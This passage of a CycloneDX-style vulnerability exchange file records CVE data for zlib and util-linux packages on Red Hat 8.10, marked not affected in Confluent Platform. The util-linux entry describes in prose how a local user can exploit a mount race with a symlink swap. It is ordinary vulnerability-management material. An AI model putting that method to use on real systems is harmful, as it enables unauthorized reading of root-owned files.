          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:pypi/requests@2.32.5"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-27171",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        1284
      ],
      "description": "zlib before 1.3.2 allows CPU consumption via crc32_combine64 and crc32_combine_gen64 because x2nmodp can do right shifts within a loop that has no termination condition.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-27171"
        },
        {
          "url": "https://7asecurity.com/blog/2026/02/zlib-7asecurity-audit"
        },
        {
          "url": "https://7asecurity.com/blog/2026/02/zlib-7asecurity-audit/"
        },
        {
          "url": "https://7asecurity.com/reports/pentest-report-zlib-RC1.1.pdf"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-27171"
        },
        {
          "url": "https://github.com/advisories/GHSA-h858-mf2m-8jf4"
        },
        {
          "url": "https://github.com/madler/zlib/issues/904"
        },
        {
          "url": "https://github.com/madler/zlib/releases/tag/v1.3.2"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27171"
        },
        {
          "url": "https://ostif.org/zlib-audit-complete"
        },
        {
          "url": "https://ostif.org/zlib-audit-complete/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-27171"
        }
      ],
      "published": "2026-02-18T04:16:01+00:00",
      "updated": "2026-06-17T10:26:47+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/zlib@1.2.11-25.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.2.11-25.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/zlib@1.2.11-25.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/zlib@1.2.11-25.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/zlib@1.2.11-25.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/zlib@1.2.11-25.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/zlib@1.2.11-25.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/zlib@1.2.11-25.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/zlib@1.2.11-25.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/zlib@1.2.11-25.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/zlib@1.2.11-25.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/zlib@1.2.11-25.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/zlib@1.2.11-25.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/zlib@1.2.11-25.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/zlib@1.2.11-25.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/zlib@1.2.11-25.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/zlib@1.2.11-25.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/zlib@1.2.11-25.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/zlib@1.2.11-25.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/zlib@1.2.11-25.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/zlib@1.2.11-25.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/zlib@1.2.11-25.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/zlib@1.2.11-25.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-27456",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "bottlerocket"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        59,
        269,
        367
      ],
      "description": "util-linux is a random collection of Linux utilities. Prior to version 2.41.4, a TOCTOU (Time-of-Check-Time-of-Use) vulnerability has been identified in the SUID binary /usr/bin/mount from util-linux. The mount binary, when setting up loop devices, validates the source file path with user privileges via fork() + setuid() + realpath(), but subsequently re-canonicalizes and opens it with root privileges (euid=0) without verifying that the path has not been replaced between both operations. Neither O_NOFOLLOW, nor inode comparison, nor post-open fstat() are employed. This allows a local unprivileged user to replace the source file with a symlink pointing to any root-owned file or device during the race window, causing the SUID binary to open and mount it as root. Exploitation requires an /etc/fstab entry with user,loop options whose path points to a directory where the attacker has write permission, and that /usr/bin/mount has the SUID bit set (the default configuration on virtually all Linux distributions). The impact is unauthorized read access to root-protected files and block devices, including backup images, disk volumes, and any file containing a valid filesystem. This issue has been patched in version 2.41.4.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-27456"
        },
        {
          "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27456"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-27456"
        },
        {
          "url": "https://github.com/bottlerocket-os/bottlerocket-core-kit/blob/develop/advisories/14.5.0/BRSA-jgcxwcxt3sxd.toml"
        },
        {
          "url": "https://github.com/util-linux/util-linux/commit/5e390467b26a3cf3fecc04e1a0d482dff3162fc4"
        },
        {
          "url": "https://github.com/util-linux/util-linux/releases/tag/v2.41.4"
        },
        {
          "url": "https://github.com/util-linux/util-linux/security/advisories/GHSA-qq4x-vfq4-9h9g"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27456"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-27456"
        }
      ],
      "published": "2026-04-03T22:16:25+00:00",
      "updated": "2026-07-24T22:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.32.1-48.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.32.1-48.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.32.1-48.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.32.1-48.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.32.1-48.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.32.1-48.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
